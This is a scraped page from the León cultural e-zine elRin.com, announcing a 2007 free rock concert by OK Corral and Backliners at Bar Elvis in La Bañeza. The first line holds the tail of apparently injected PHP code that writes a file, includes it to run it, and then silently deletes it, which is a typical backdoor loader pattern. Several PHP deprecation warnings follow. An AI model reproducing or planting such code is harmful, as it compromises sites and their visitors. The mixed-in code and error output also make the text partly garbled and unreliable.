");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> el Rin.com, E-zine Inquieto y Agenda Cultural de León
Logo elrin.com
uvedoble-uvedoble-uvedoble-punto-elrin-punto-com elRin
Los datos de elRin.COM 1840 noticias publicadas
1690 Rineros registrados
0 Rineros conectados
3 anonimos conectados
652 mensajes en el foro
14069 mensajes en el foro antiguo
Frase Rinera: El talento no es garantia de ninguna otra virtud humana. [Robert Christgau] Envía la tuya
Deprecated: Function ereg_replace() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 66 Deprecated: Function split() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 67 Deprecated: Function ereg_replace() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 74 Deprecated: Function split() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 75 Deprecated: Function ereg_replace() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 82 Deprecated: Function split() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 83 Deprecated: Function ereg_replace() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 90 Deprecated: Function split() is deprecated in /usr/home/elrin.com/web/noticias/index.php on line 91
Noticias pasadas

Backliners & OK Corral

18 de Agosto de 2007 a las 23:00 en Bar Elvis La Bañeza.

concierto

El pasado año, fue la primera edición del Elvis Loves Rock, actuaron en el mismo escenario, Los Platillos Volantes, Los Hijos de Jack, El hombre de Jade y OK corral. Este año, OK Corral repiten, y presentarán en directo su último disco a partir de las 23:00 de la noche.

El concierto se celebra el Sábado 18 de Agosto, el mismo dia que miles de aficionados a las motos se acercan a La Bañeza para ver el campeonato de España de motociclismo, la única carrera en circuito urbano de España, algo que la lógica ya no permite por su peligrosidad, pero que rezuma autenticidad por todos sus poros, una carrera "rara avis", solo comparable a la famosa carrera urbana de la Isla de Man en Inglaterra.

Después de OK Corral, serán Los Backliners, los que desplegarán su repertorio intenso y lleno de Rock para una noche de verano. Otra vez se juntan los Octanos y los decibelios, un concierto con olor a goma quemada. Todo esto en pleno centro de La Bañeza, en la plaza del Bar ELVIS. La entrada es libre.

Foto3

Noticias pasadas
Noticias Agenda
Opinodromo

Último mensaje

Opinodromo antiguo
Tablón de anuncios

Estamos en ello

Estamos trabajando en el nuevo tablón de anuncios. Todavia no está operativo.

Grupos de León
Noticias pasadas

Son y no Son.

Son y no Son.

31 de Mayo de 2008